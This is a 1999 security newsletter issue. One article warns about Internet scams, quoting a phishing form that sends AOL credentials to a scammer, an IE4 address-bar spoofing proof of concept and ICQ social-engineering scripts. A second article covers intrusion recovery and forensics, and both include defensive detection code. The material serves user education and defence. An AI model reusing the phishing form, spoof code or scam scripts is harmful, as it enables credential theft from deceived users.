"One of the organisers, Agio Pereria, said a clear message was being
sent to anyone planning to sabotage the ballot and abort the consultation
process. "Don't stop our people to reach the ballot box, because this is
a right," he said. "Each individual has his or her right to exercise the
right to vote in peace. And we hope that this is the message that we
send today."
diva aka Pasty Drone
NewsTrolls, Inc. , http://www.newstrolls.com
pastydrone@newstrolls.com
XI. Scams - Getting something by all means
------------------------------------------
This article will talk about common light Internet scams that could
happen to anyone who is not careful (but do note that they most often
happen to people without much knowledge of computers, especially the
basics of Internet surfing).
I don't know why, but a lot of wannabe "hackers" think that they must start
with Hotmail or Yahoo hacking. They want to get someone's e-mail
password so they can read his e-mail, tease the "victim" and get some
other passwords (for example, if the victim registered a web page with
the compromised e-mail address, the attacker could easily snatch it). Even
when I started working on net-security, I got a lot of e-mail saying things
like: "Help me to hack a hotmail account". Better advice to these people
is to start learning something that could really be useful to them.
(1)
Hotmail "hacking" (this one is almost legendary, because this "way
of hacking" can be found on almost every Usenet group with hack in
its name).
<********************************************************************>
First, start with opening your own hotmail address.
Select compose.
Type in :
To: emailoftheattacker@hotmail.com
Subject: HTM.MSN.PW.REQ
(It is absolutely necessary to type in CAPITALS - subject
headers are case sensitive )
Message:
[First line] The login name of the person you want to hack
[2nd line] Your own password.
Because the automatic hotmail responder will require your
"systemadministrator password" which is in fact are your own password!
But the computer doesn't know that
[third line] x3iZ0k45-MSN-6TqGW-reqf47890sys (case sensitive)
How it works:
You mail to a systemadministrators automatic responder.
Usually only system administrators should be able to use this
( when for example getting lost passwords ), but when you try it
with your own password and mail the above explained message from your
hotmail account the computer gets confused!
MSN will respond with an automated message indicating the password requested
NOTE that if the message you send MSN is composed incorrectly,
or there has been a change in the status of the user queried,
you may not get an automated response
In this event, you will need to resubmit the request.
This "trick" usually takes about 4 hours to get a reply of.
<********************************************************************>
I am sad to say that, according to the complaints of victims on Usenet,
this fraud actually works on some people. The whole story about sending
your own password is bogus, and it isn't very imaginative either.
I came across this page on Geocities, and it is just a slightly
modernized version of an old fraud that we wrote about on net-security
exactly 10 months ago (sending your password was then explained like
this: "By doing this, the computer which receives the email believes you
are a Hotmail System administrator, and sends you the password you
require within 1-2 hours").
(2)
AOL web fraud
I came across this trick by reading attrition's mirrors of hacked
pages. Originally the site for this scam was on www.arodnet.com, with
a backup on the pages.hotbot.com server. Just to note, as I'm writing
this the page has been defaced again. When you access this page it looks
exactly like the AOL NetMail site (www.aol.com/netmail). There is a form
where you enter your Screen Name and password. When you submit it, the
form doesn't do what you think it is supposed to do: it sends an e-mail
message with your login and password to its creator. The code follows:
<********************************************************************>
<form action="http://bewoner.dma.be/bew-bin/ukmailer.cgi" method=POST>
<INPUT TYPE="HIDDEN" NAME="recipient" VALUE="sabbs@hotmail.com">
<input type=hidden name="subject" value="You've Got Mail">
<input type=hidden name="redirect" value="http://pages.hotbot.com/biz/deity/error.html">
<********************************************************************>
The form never talks to AOL at all. It posts to a public form-to-mail CGI
(ukmailer.cgi, evidently a FormMail-style script) that mails every
submitted field to whatever address the hidden "recipient" field names,
and then sends the browser to the hidden "redirect" URL. So your
information goes to the scammer, you get an HTML note saying you entered
the wrong password, and you are sent on to the REAL Net Mail log-on
site. If you were not too cautious, you shared your login without a clue
that you did it.
Just to add: scammers who obtain a screen name and password could do
considerable harm to an AOL member's account. An account violator could
use the member's communications features, such as e-mail and the instant
messenger buddy list, or even purchase goods with the member's credit
card.
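As an added example, not part of the article or of the scam page, the following Python code spots the pattern above in a page's HTML: a login form with a password field that posts to a different host than the page, or whose hidden fields tell a form-to-mail CGI where to send the submission and where to bounce the victim afterwards. The fake page below is reconstructed from the snippet in the article with assumed names for its visible inputs (screenname, password); the benign page and both page URLs are made up for the comparison.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed look-alike page: the form is the one from the article, the two
# visible fields (screenname, password) are assumed names for its inputs.
FAKE_NETMAIL = """<html><body><h1>AOL NetMail</h1>
<form action="http://bewoner.dma.be/bew-bin/ukmailer.cgi" method=POST>
<input type="hidden" name="recipient" value="sabbs@hotmail.com">
<input type=hidden name="subject" value="You've Got Mail">
<input type=hidden name="redirect" value="http://pages.hotbot.com/biz/deity/error.html">
Screen Name: <input type=text name="screenname"><br>
Password: <input type=password name="password"><br>
<input type=submit value="Sign On">
</form></body></html>
"""

# Constructed benign login page for comparison: posts back to its own host, no hidden routing.
REAL_LOGIN = """<html><body>
<form action="/netmail/login" method=POST>
Screen Name: <input type=text name="screenname">
Password: <input type=password name="password">
<input type=submit value="Sign On">
</form></body></html>
"""


class FormCollector(HTMLParser):
    """Collect every <form> with its action attribute and its <input> fields."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self._current = {"action": a.get("action", ""), "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append(
                (a.get("type", "text").lower(), a.get("name", ""), a.get("value", "")))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def suspicious_forms(html, page_url):
    """Return (reason, action_url) pairs for password forms that behave like the Net Mail scam."""
    collector = FormCollector()
    collector.feed(html)
    page_host = urlparse(page_url).hostname
    findings = []
    for form in collector.forms:
        if "password" not in {t for t, _, _ in form["inputs"]}:
            continue                       # no credential field, not a login form
        action = urljoin(page_url, form["action"])
        hidden = {n.lower(): v for t, n, v in form["inputs"] if t == "hidden"}
        if urlparse(action).hostname != page_host:
            findings.append(("password posted to another host", action))
        if "@" in hidden.get("recipient", ""):
            # FormMail-style CGIs mail every field to whatever this hidden field names
            findings.append(("form mailed to " + hidden["recipient"], action))
        if "redirect" in hidden:
            findings.append(("victim bounced to " + hidden["redirect"] + " after submit", action))
    return findings


if __name__ == "__main__":
    for reason, action in suspicious_forms(FAKE_NETMAIL, "http://www.arodnet.com/netmail.html"):
        print(f"{reason}: {action}")
    print("benign form findings:", suspicious_forms(REAL_LOGIN, "http://www.aol.com/netmail"))
```

The host comparison is the check a user can make by eye: the page says AOL, the form's action says somewhere else. The hidden-field checks catch the lazy version of the scam that borrows someone else's mailer CGI instead of writing its own.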
I was thinking about how this fraud could be made even more realistic.
When you enter the password, a new HTML file opens saying that you must
try again, and the address bar in this case shows:
http://pages.hotbot.com/biz/deity/error.html
With some JavaScript, and knowledge of the frame spoofing vulnerability,
the scam could be improved to the maximum.
The frame spoofing vulnerability was found by Georgi Guninski and "works"
on Internet Explorer 4.x browsers (the bug was patched afterwards). It lets
a page open a window whose address bar shows a URL of the attacker's
choosing while the content is written by the attacker's script. This
example opens a fake www.yahoo.com website:
<********************************************************************>
<SCRIPT>
b=showModalDialog("about:<SCRIPT>a=window.open('http://www.yahoo.com');"
  + "a.document.write('<HTML><HEAD><TITLE>Yahoo</TITLE><BODY></HEAD>"
  + "<H1>Look at the address bar!<BR>');"
  + "a.document.write('<A HREF=\"http://www.whitehats.com/guninski\">"
  + "Go to Georgi Guninski\\'s home page</A></H1></BODY></HTML>');"
  + "close()</" + "SCRIPT>%01http://www.yahoo.com");
</SCRIPT>
<********************************************************************>
All this information about using the frame spoofing vulnerability with
this scam is presented for educational purposes, so that you can see
that you must be really careful: with a few little tricks you can be
deceived easily.
(3)
ICQ password stealing
If you are not suspicious enough, you could easily lose your ICQ password.
This is the "ICQ exploit" that can be found on some "underground"
sites on the Internet. It isn't really an exploit, just a way
to get someone's ICQ password easily.
<********************************************************************>
Ok..the trick to this is to trick someone into putting
your email address as their email address..and then you
goto www.icq.com/password and type in their UIN..it sends
their password to the email in their info..now here are a
few tricks to get them to put your email or any email you know
the password to in their ICQ info..
1)you have a klan? Ask them to join..if they do..tell them
you have a klan email..(yourklan@hotmail.com)or whatever
tell them to put that as their email so people can contact
<********************************************************************>
So don't change the e-mail address in your ICQ settings at someone else's
request, because it can only hurt you (think about it: why would someone
tell you to put his e-mail address in your ICQ settings, if not to use it
against you?). Most of these scams work on a social engineering basis:
they try to make you believe them.
(4)
Combinations
Following two stories were picked up by news sites.
CNET (www.cnet.com) 04.03.1998 > "Hotmail suffers email scam"
A Hotmail user who registered the name "admin@hotmail.com" sent out
official-sounding email to an indeterminate number of people earlier
this week telling users that "The trial period for your free Hotmail
Service is rapidly coming to a close."
It goes on to tout Hotmail's features and tells users the accounts will
cost $10 per year. It then requests that the user send an email to
"admin@hotmail.com" for an account form.
"Payments will be accepted by certified cheque, money order, or credit
cards only," it states.
Hotmail pulled the account yesterday as soon as the staff found out
about it, said Randy Delucchi, Hotmail's director of customer service.
Delucchi said he wasn't sure how many people got the email message,
but added he was sure it "wasn't very widespread at all," because
Hotmail has implemented antispam measures that prevent email from being
sent to more than 25 people at a time.
Spammers generally like to send email to thousands of people at once.
This is not the first time people have used free email to try to scam
their fellow Netizens.
In December, someone used Yahoo's free email to send out an
official-looking letter telling users they had won a modem from Yahoo
and would have to supply their names, addresses, and telephone numbers
as well as a credit card number to pay for shipping.
CNET (www.cnet.com) 22.04.1999 > "AOL warns of email scam"
America Online is warning users that email messages posing as
AOL-endorsed offers and notices are really trying to gather sensitive
member information.
A number of these messages have such subject headings as "AOL Server
Error," "AOL Billing Problem," "Beanie Babies," or "AOL Rewards," and
are intended to lure members to open them, according to a cautionary
posting on the "Neighborhood Watch" page within AOL's proprietary
service.
The warning says the messages contain HTML hyperlinks that lead to
Web sites pretending to be a standard registration Web page. But these
pages ask for member screen names or passwords, which could potentially
lead scammers into AOL member accounts.
One sample email reads: "A database error has deleted the information
for over 25,000 accounts, and yours is one. In order for us to access
the back-up data of your account, we do need your password. Without
your password, we will NOT be able to allow you to sign onto America
Online within the next 24 hours after your opening of this letter."
According to AOL spokesman Rich D'Amato, AOL posted its warnings three
weeks ago, prompted by "member complaints, as well as emails that we
had been seeing."
So you got the point: be very careful. Scams differ, from the really
pathetic ones (that Hotmail hacking) to more complex ones (using frame
spoofing). Also note that the words hack/hacking are in quotes, because
scams are in no way a means or method of hacking.
Berislav Kucan
aka BHZ
bhz@net-security.org
http://net-security.org
XII. Intrusion and detection part two
---------------------------------------
This is a follow-up to last week's article on responding to an intrusion,
which can be found at http://default.net-security.org/dl/default2.txt.
Today I'll go into a more in-depth look at recovering from an intrusion,
and a brief look at computer forensics -- i.e., what to do if you want to
try to get the law involved in the incident.
Much like any other part of intrusion response, recovery from attack
starts before you've been attacked. It can be very difficult to recover
if you don't have recent backups of your system, so back things up
regularly; nightly if possible. If you've got important information on
your system, a nightly backup just makes sense. I prefer backing up to
tape if you can afford a tape drive, but it's not a requirement. What you
do need is some form of backup that holds your important system files and
binaries, so you can restore if something happens, or a rescue disk that
contains clean versions of important system binaries.
Also, preferably at the time you actually install your operating system
(so you're sure it's clean), run a program that baselines your system.
Tripwire, for instance, is a wonderful tool that works on Solaris, Linux,
and Windows NT. It takes a sort of snapshot of your system and creates a
database which holds a cryptographic checksum, size, timestamps, owner and
access permissions for each file. If you feel that your system may have
been compromised, you can run tripwire against it again and compare the
results to see if anything's changed (tripwire can even be run regularly
to detect changes; perhaps run it just before your regular backup, to see
if anything's been altered since the last one). Keep that database, and
the tripwire binary itself, on read-only media such as a write-protected
floppy or a CD: a database the attacker can rewrite proves nothing.
Tripwire aids in recovery because it can point out exactly which files
were damaged or altered, as in the case of trojaned binaries and
rootkits, and allows quick replacement of them with good copies.
And of course, the third thing to do before an intrusion begins is to be
aware of intrusion detection tools. Run them, watch the logs, and be
alert -- you can't recover from an attack you don't know happened.
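What Tripwire does can be shown in a few dozen lines. The following is an added example in Python, written for this article and not Tripwire's own code: snapshot() records a SHA-256 digest, size, mode, owner and modification time for every file under a root, compare() reports what was added, removed or changed between two snapshots, and demo() builds a throwaway tree, tampers with it the way a rootkit would (a trojaned ls padded to the original size with its mtime put back, a deleted ps, a sniffer log hidden in a "..." directory) and returns the diff. The file names and contents are constructed for the demonstration.

```python
import hashlib
import json
import os
import stat
import tempfile


def fingerprint(path):
    """Checksum plus the inode attributes a rootkit would have to forge to stay hidden."""
    st = os.lstat(path)
    digest = hashlib.sha256()
    if stat.S_ISREG(st.st_mode):
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(65536), b""):
                digest.update(chunk)
    elif stat.S_ISLNK(st.st_mode):
        digest.update(os.readlink(path).encode())
    return {
        "sha256": digest.hexdigest(),
        "size": st.st_size,
        "mode": oct(stat.S_IMODE(st.st_mode)),
        "uid": st.st_uid,
        "gid": st.st_gid,
        "mtime": int(st.st_mtime),
    }


def snapshot(root):
    """Map every file path (relative to root) to its fingerprint."""
    db = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            db[os.path.relpath(full, root)] = fingerprint(full)
    return db


def compare(baseline, current):
    """Return {'added': [...], 'removed': [...], 'changed': {path: [fields that differ]}}."""
    report = {"added": sorted(set(current) - set(baseline)),
              "removed": sorted(set(baseline) - set(current)),
              "changed": {}}
    for path in sorted(set(baseline) & set(current)):
        diffs = [k for k in baseline[path] if baseline[path][k] != current[path][k]]
        if diffs:
            report["changed"][path] = diffs
    return report


def demo():
    """Baseline a constructed tree, simulate a rootkit, and diff the two snapshots."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "bin"))
        os.makedirs(os.path.join(root, "tmp"))
        for name, body in (("ls", b'#!/bin/sh\nexec /usr/bin/ls "$@"\n'),
                           ("ps", b'#!/bin/sh\nexec /usr/bin/ps "$@"\n')):
            with open(os.path.join(root, "bin", name), "wb") as f:
                f.write(body)
        # Serialise and reload, as if the baseline came back off read-only media.
        baseline = json.loads(json.dumps(snapshot(root)))

        # Simulated rootkit: ls replaced by a same-size trojan with its mtime put
        # back, ps deleted, and a sniffer log hidden in a "..." directory.
        ls = os.path.join(root, "bin", "ls")
        before = os.stat(ls)
        with open(ls, "wb") as f:
            f.write(b'#!/bin/sh\nexec /tmp/.../ls "$@"\n')      # same length as the original
        os.utime(ls, (before.st_atime, before.st_mtime))
        os.remove(os.path.join(root, "bin", "ps"))
        hidden = os.path.join(root, "tmp", "...")
        os.mkdir(hidden)
        with open(os.path.join(hidden, "sniffer.log"), "wb") as f:
            f.write(b"root/hunter2@10.0.0.5\n")                 # constructed capture line

        return compare(baseline, snapshot(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The point of the demo is the changed entry: size and mtime match the baseline exactly, because the attacker took care of both, and only the checksum gives the trojan away. That is why the comparison has to be against a cryptographic digest and not against ls -l output.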
As I discussed last week, one of the most important things you can do is
log, and maintain the integrity of your logs. The need for good logs
really comes into play here, in several different ways. For the purposes
of this article, I'm assuming that you have intrusion detection tools
running, tripwire installed, and are watching and recording your logs. I
should note that it's best to log to a remote, secure loghost, log to a
printer, or at least make sure that if your logs are on the same host,
your log files are append-only (only new text can be added; on Linux ext2
that is the chattr +a attribute, which an attacker with root can still
clear, so it buys time rather than certainty). Most rootkits now go
through and edit logs to remove an attacker's traces. If you're logging
to a different machine or a cheap dot matrix printer in the corner,
they'll have a hard time covering their tracks -- I'm going to assume,
for this article, that your logs are intact.
When your intrusion detection software starts sending out alerts, the most
important rule is -not- to panic. You cannot react faster than data can
come into your computer -- by the time you've noticed the attack, the
attacker is already several steps ahead of you, and may already be in your
system before you can react.
Isolate the machine. One school of thought advocates pulling the power
cord out of the computer (don't shut down first; many rootkits install
cleanup routines in the system's shutdown procedures, and you'll lose
anything they'd added). I don't advocate this as a first step -- I suggest
pulling the network cable (modem, ethernet, whatever you have connecting
your machine to the internet). Pulling the power can lose you a lot of
information that would be helpful in diagnostics -- a lot of scripts put
files in /tmp, for instance, and on some operating systems that would be
lost on a power-down, as would the list of running processes, open
network connections and anything else that lives only in memory. Once
you've gotten the information you need, run tripwire to get a new
database of exactly what the system looks like now... -then- pull the
power cord (again, don't shut down normally). The reason for this becomes
important later.
It's at this point that you need to decide whether or not to pursue legal
action. In most cases, especially for home users, the hassle of law
enforcement involvement is not worth it, and all you'll want to do is
rebuild and secure your machine. At the end of this article is a brief
discussion of what to do if you -do- want to involve law enforcement.
You've been attacked -- now it's time to rebuild. You have two options --
the easy way and the paranoid way. The paranoid way is pretty
self-explanatory: wipe -everything- and restore from a known clean backup
or reinstall from read-only media.
For the easy way, turn your system back on, but -don't- plug it into the
network. Get your clean backup disk (run tripwire on your backup to make
certain it's clean), find the files that were altered (compare the
backup's tripwire database with the current files on your system), and
replace them with the safe binaries you'd had on your backup. Commonly
replaced binaries include /bin/login, /bin/ps, /bin/ls, /bin/df,
/bin/netstat, /usr/etc/in.telnetd, /usr/etc/in.ftpd, /usr/etc/in.tftpd,
/usr/sbin/ifconfig, etc. (note that these locations differ between
flavors of UNIX). Check -everything- -- files can be changed in
unexpected ways, or be added in unusual places. Some attackers like to
hide their files, for instance, in /tmp, /etc/tmp, /var/temp, /usr/spool,
etc. Look for files and directories with spaces in the name, or named
with nothing but dots (". ", "..."), so that a casual ls overlooks them.
Look for alterations of /etc/hosts.equiv, /bin/.rhosts (or any .rhosts
file at all), /etc/passwd, /etc/group, etc. 'find' is a good command for
this; it can locate all suid/sgid files, sneaky .rhosts files, etc. Look
for suid root binaries in unexpected places.
Next, make sure there isn't a sniffer installed. On UNIX-based machines,
if a sniffer is installed on an interface, the interface will have the
PROMISC flag set (short for 'promiscuous' -- it means the interface is
listening to all the traffic on the network, not just the packets
intended for that interface). Sounds easy? Not so. There are scripts
that install a sniffer -and- hide the PROMISC flag, usually by replacing
ifconfig with a copy that never prints it. The way to check is to set the
interface PROMISC yourself, and then see whether the PROMISC flag shows
up. If it doesn't, you may have a problem -- replace ifconfig with a
known good copy (or run the copy from your read-only media), and again,
look for strange suid binaries and files owned by root that shouldn't be.
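The sweep just described, as an added example in Python (not the article's own code): classify() gives the reasons a file deserves a second look (set-uid/set-gid bits, .rhosts and hosts.equiv files, whitespace or dot-only names, executables in the scratch directories named above, and regular files under /dev, where rootkits like to stash their configuration), sweep() applies it to (path, mode, uid) records, and fs_records() produces those records from a mounted image with lstat. The SAMPLE records are constructed, with made-up paths, so the classification can be checked without a real compromised disk; on a real one, find / -type f \( -perm -4000 -o -perm -2000 \) -ls and find / -name .rhosts do the first two checks from the shell.

```python
import os
import stat

# Directories the text names as favourite hiding places (trailing slash so
# "/tmpfoo" does not match).
SCRATCH_DIRS = ("/tmp/", "/etc/tmp/", "/var/tmp/", "/var/temp/", "/usr/spool/")


def classify(path, mode, uid):
    """Return the reasons a file deserves a second look, or [] if there are none."""
    reasons = []
    base = os.path.basename(path)
    if mode & stat.S_ISUID:
        reasons.append("set-uid root binary" if uid == 0 else "set-uid binary")
    if mode & stat.S_ISGID and not stat.S_ISDIR(mode):   # set-gid directories are normal
        reasons.append("set-gid binary")
    if base.strip() in (".rhosts", "hosts.equiv"):
        reasons.append("trust file (check every host it names)")
    if any(c.isspace() for c in base):
        reasons.append("whitespace in name")
    if base.strip(".") == "" and base not in (".", ".."):
        reasons.append("dot-only name (hidden directory trick)")
    if stat.S_ISREG(mode) and (mode & 0o111) and path.startswith(SCRATCH_DIRS):
        reasons.append("executable in a scratch directory")
    if stat.S_ISREG(mode) and path.startswith("/dev/"):
        reasons.append("regular file under /dev")
    return reasons


def sweep(records):
    """records: iterable of (path, mode, uid).  Returns {path: [reasons]} for flagged files."""
    flagged = {}
    for path, mode, uid in records:
        reasons = classify(path, mode, uid)
        if reasons:
            flagged[path] = reasons
    return flagged


def fs_records(root="/"):
    """Walk a (read-only!) mounted image and yield (path, mode, uid) from lstat."""
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue
            yield full, st.st_mode, st.st_uid


# Constructed records standing in for fs_records() on a compromised box; the
# modes are the usual octal permissions with the file-type bits added.
SAMPLE = [
    ("/bin/login", stat.S_IFREG | 0o755, 0),
    ("/usr/bin/passwd", stat.S_IFREG | 0o4755, 0),      # legitimate set-uid, still worth listing
    ("/tmp/.../ps", stat.S_IFREG | 0o4755, 0),          # set-uid root copy hidden in /tmp
    ("/tmp/...", stat.S_IFDIR | 0o755, 0),
    ("/usr/spool/ .rhosts", stat.S_IFREG | 0o644, 0),   # leading space hides it from a glance
    ("/dev/ptyr", stat.S_IFREG | 0o644, 0),             # rootkit config posing as a device
    ("/home/alice/.rhosts", stat.S_IFREG | 0o644, 1000),
    ("/etc/passwd", stat.S_IFREG | 0o644, 0),
]


if __name__ == "__main__":
    for path, reasons in sweep(SAMPLE).items():
        print(f"{path}: {', '.join(reasons)}")
```

Run fs_records() against the read-only copy, never the live disk, and compare the set-uid list with the one from your baseline: a set-uid binary that is not in the baseline is the attacker's way back in.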
Personally, I recommend wiping everything and starting from a good backup.
It's safer, and you don't need to worry about having missed something
important. Reinstalling from known good media may be paranoid, but it
obviates a lot of the work of finding all files that have been tampered
with, and will remove things like sniffers and back doors. If you'd like
to do an in-depth analysis, make a complete sector-by-sector copy of the
compromised disk before you wipe it, then mount (don't boot, mount) the
copy read-only on a known good system, and do your analysis there.
Now start going through the logs. What happened? Do you see anything
unusual? Look as far back through your logs as you can; maybe you'll see
the initial intrusion. Using another computer (or the hacked system, if
you feel lucky, punk), use search engines to look up anything in your logs
you don't understand; you may be surprised at what you find. The goal is
to find out exactly how the attacker got in, find the hole, and repair it.
Most commonly-exploited holes have patches -- do some research on your
favorite search engine, find the exploit, find the patch, and fix the
hole. If you can't find anything that might have been used against you
(and be sure to look in the Bugtraq archives at
http://www.securityfocus.com/ -- click on 'forums', then 'bugtraq', then
'archive'), you may want to e-mail cert@cert.org to notify the CERT team.
They may not respond, but if it really is a new exploit, they'll look
into it -- see http://www.cert.org/tech_tips/incident_reporting.html for
more information. Once you've got your system patched and replaced all
the altered files, change all passwords on the system, just in case the
attacker has your /etc/passwd (or /etc/shadow) file. If a sniffer was
running, assume every password typed on or through that machine is known,
including passwords for other hosts, and change those too.
But suppose you -do- want to take the matter to law enforcement. The most
important thing you can do, in that case, is to preserve
evidence... and your hard drive is evidence. When you pulled the power on
your hacked machine, you preserved as much of the current state of your
system as you could. Now you need to physically remove the hard drive
from the computer and set it aside as read-only. If you want to do
analysis on it, make a complete physical sector-by-sector copy (through a
hardware write-blocker if you have one), record a cryptographic checksum
of both the drive and the copy so you can later show that they match, and
mount the copy -- don't boot it -- read-only on a known 'good' system; do
your analysis on -that-. Place the original drive in a safe along with a
copy of the original tripwire database and a copy of the tripwire
database you'd taken just before pulling the plug. Also put into the safe
all of the relevant logs, in read-only form to prove they have not been
edited -- one idea is to print out your logs, sign and date them, and
have them notarized to prove the electronic copies have not been tampered
with. Include as well as much information as you had been able to gather
about the attacker (see the previous article at
http://default.net-security.org/dl/default2.txt for a simple discussion
of how to identify the attacker). The more information you can provide
law enforcement, the more likely they are to be able to prosecute.
Document everything you possibly can -- a clear chain of custody must be
compiled before you can hope to have anything done, and you must be able
to show that the evidence has not been tampered with. Once you have all
your evidence, contact law enforcement -- I should note that, just as
it's a good idea to know who your ISP's security team is ahead of time,
it's handy to know ahead of time whom to contact among local law
enforcement.
And be nice to them. You -want- them to like you.
Comments to this article are welcome -- not everyone responds to incidents
in the same way, and I'd be very interested in hearing other methods, or
hearing opinions I may not have considered yet.
/dev/null
null@fiend.enoch.org
(thanks to mike@enoch.org for his help with this article)
--------------------------------------------------------------------------------
Default newsletter Issue #3
http://default.net-security.org
27.08.1999 Help Net Security
http://www.net-security.org
--------------------------------------------------------------------------------